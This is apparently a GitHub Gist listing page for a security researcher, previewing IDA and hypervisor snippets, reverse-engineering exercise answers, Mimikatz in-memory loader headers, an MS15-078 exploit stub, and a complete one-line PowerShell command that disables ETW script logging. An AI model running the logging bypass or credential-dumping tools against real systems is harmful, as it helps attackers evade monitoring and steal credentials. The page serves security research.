Skip to content

Instantly share code, notes, and snippets.

Avatar

Satoshi Tanda tandasat

View GitHub Profile
@tandasat
tandasat / list_first_instruction.py
Created Jun 26, 2021
IDA script to show the first instruction of the all functions
View list_first_instruction.py
from idautils import *
from idaapi import *
from idc import *
for funcea in Functions():
functionName = get_func_name(funcea)
for (startea, endea) in Chunks(funcea):
print(f"{startea:08x} {GetDisasm(startea)} : {functionName}")
@tandasat
tandasat / CheckGuestVmcsFieldsForVmEntry.c
Last active Jul 24, 2021
Simulation of checks performed as per 26.3 CHECKING AND LOADING GUEST STATE
View CheckGuestVmcsFieldsForVmEntry.c
/**
* @file CheckGuestVmcsFieldsForVmEntry.c
* @author Satoshi Tanda (tanda.sat@gmail.com)
* @brief Checks validity of the guest VMCS fields for VM-entry as per
* 26.3 CHECKING AND LOADING GUEST STATE
* @version 0.1
* @date 2021-02-20
*
* @details This file implements part of checks performed by a processor during
* VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit
View GuestAgent.c
/*!
@file GuestAgent.c
@brief GuestAgent code.
@author Satoshi Tanda
@copyright Copyright (c) 2020 - , Satoshi Tanda. All rights reserved.
*/
#include "GuestAgent.h"
View Invoke-BypassingMimikatz.ps1
#
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
@tandasat
tandasat / KillETW.ps1
Last active Oct 29, 2022
Disable ETW of the current PowerShell session
View KillETW.ps1
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
View Invoke-Mimikidz
This file has been truncated, but you can view the full file.
function Invoke-Mimikidz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
@tandasat
tandasat / elevator.c
Created Apr 27, 2016 — forked from sh1n0b1/elevator.c
Windows Open Type ‘atmfd.dll’ Privilege Escalation MS15-078
View elevator.c
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"
//include OTF
#include "font.h" // foofont is fetched from loader config struct
//#include "cert.h"
@tandasat
tandasat / ch3_answers.c
Created Nov 21, 2014
(Suspended) Answers of exercises in Practical Reverse Engineering Chapter 3
View ch3_answers.c
Susupended because of other project.
///////////////////////////////////////////////////////////////////////////////
//
// p123
//
I used Windows 8 kernel version 16628.
//////////////////////////////// 1-6
@tandasat
tandasat / ch1_answers.c
Created Nov 19, 2014
Answers of exercises in Practical Reverse Engineering Chapter 1
View ch1_answers.c
///////////////////////////////////////////////////////////////////////////////
//
// p11
//
//////////////////////////////// 1
; ASM
edi = s->0x8_charp
edx = edi
eax = 0
View run.bat
set TARGET_BXRC=bochsrc2.4.6
set BXSHARE=C:\Program Files (x86)\Bochs-2.4.6
set IDABASE=C:\Program Files (x86)\IDA
"%IDABASE%\idaq.exe" -c -A -OIDAPython:mbr.py %TARGET_BXRC%.bxrc
"%IDABASE%\idaq.exe" -rbochs %TARGET_BXRC%.idb